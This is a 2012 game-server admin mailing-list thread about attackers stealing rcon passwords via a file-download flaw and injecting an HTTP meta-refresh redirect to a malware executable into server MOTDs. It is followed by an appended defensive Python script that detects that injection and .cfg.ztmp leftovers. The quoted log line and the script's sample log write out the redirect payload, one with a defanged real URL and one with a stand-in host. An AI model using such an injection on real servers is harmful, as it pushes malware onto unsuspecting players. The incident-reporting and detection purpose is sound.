Is this an ok practice? I never thought about having my rcon password in my file - I guess it would be more secure if you just start it up with the rcon password in the string? Doesn't it show up when you run top/htop though?
On Tue, Jul 3, 2012 at 12:05 PM, Ken Bateman <[email protected]> wrote:
> For quite a while we have been careful to specify our tf2 rcon passwords on
> the command line, not a config file, because we suspected the existence of
> an exploit like this.
>
> It's possible that the vulnerability might be in tcadmin.
>
> -Ken
>
> On Jul 3, 2012 2:54 PM, "c0m4r" <[email protected]> wrote:
>
> > There is an exploit in q3 engine named "q3dirtrav", which allows players
> > to download any of server files, including server configuration
> > (server.cfg). Today I found evidence of possible existence of the same
> > exploit in HLDS. As a company we host hundreds of servers. We received many
> > reports from our customers about strange HTTP refresh meta tag in the
> > motd.txt of their servers, which leads to "http *//free -leaks *com/cstrike*exe".
> > The problem has affected several different servers, unrelated to each other,
> > with very different RCON passwords (but most were very strong).
> > Here's what I have found in logfiles:
> > Rcon from 178.123.103.201:15518:rcon 1399145428 XXXXXXXXXXXXXXXXXXX motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=http *//free -leaks *com/cstrike*exe">
> > This "cstrike.exe" contains some kind of a virus.
> > (Note: I've replaced dot with asterisk and spaces)
> > As you can see the attacker knew the RCON password of each server.
> > Then I found "server.CFG.ztmp" file in cstrike of each server, which was attacked.
> > For me that means that the attacker was able to download server.cfg exactly the
> > same way as maps, models or sounds.
> > _______________________________________________
> > To unsubscribe, edit your list preferences, or view the list archives, please visit:
> > https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
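As an added example (not from anyone in this thread), a small triage script for the two indicators c0m4r describes: rcon `motd_write` calls that inject an HTTP refresh meta tag, and `.cfg.ztmp` leftovers that show server.cfg was served through the file-download path. The log line shape is assumed from the one quoted above; the IP, challenge, password and URL in the sample are constructed placeholders, and the function names are my own.

```python
import re
from pathlib import Path

# Constructed sample lines in the shape quoted in the report. The address,
# challenge number, password and URL are placeholders, not values from the thread.
SAMPLE_LOG = """\
Rcon from 203.0.113.7:15518:rcon 1399145428 S3cretRc0n motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=http://malicious.example/cstrike.exe">
Rcon from 198.51.100.4:27015:rcon 1399145429 S3cretRc0n changelevel de_dust2
Rcon from 203.0.113.7:15519:rcon 1399145430 S3cretRc0n motd_write Welcome to our server
"""

# "Rcon from <ip>:<port>:rcon <challenge> <password> <command>"
RCON_RE = re.compile(
    r"Rcon from (?P<src>[\d.]+:\d+):rcon (?P<challenge>\d+) (?P<password>\S+) (?P<cmd>.*)$"
)
# Any meta refresh turns the MOTD (rendered in the client's HTML view) into a redirect.
REFRESH_RE = re.compile(r"<\s*meta[^>]*http-equiv\s*=\s*[\"']?refresh", re.IGNORECASE)


def suspicious_rcon_events(log_text):
    """Return (source, command) pairs for motd_write calls carrying a refresh tag.
    The rcon password captured in the log is deliberately not echoed back."""
    hits = []
    for line in log_text.splitlines():
        m = RCON_RE.search(line)
        if not m:
            continue
        cmd = m.group("cmd")
        if cmd.startswith("motd_write") and REFRESH_RE.search(cmd):
            hits.append((m.group("src"), cmd))
    return hits


def flag_cfg_ztmp(names):
    """Keep only .ztmp files that are compressed copies of a .cfg (case-insensitive,
    so 'server.CFG.ztmp' as seen in the report is caught)."""
    return [n for n in names if n.lower().endswith(".cfg.ztmp")]


def scan_game_dir(game_dir):
    """Walk a game directory (e.g. cstrike/) for .cfg.ztmp leftovers."""
    root = Path(game_dir)
    return flag_cfg_ztmp(sorted(str(p.relative_to(root)) for p in root.rglob("*.ztmp")))


if __name__ == "__main__":
    for src, cmd in suspicious_rcon_events(SAMPLE_LOG):
        print(f"suspicious motd_write from {src}: {cmd[:60]}...")
```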

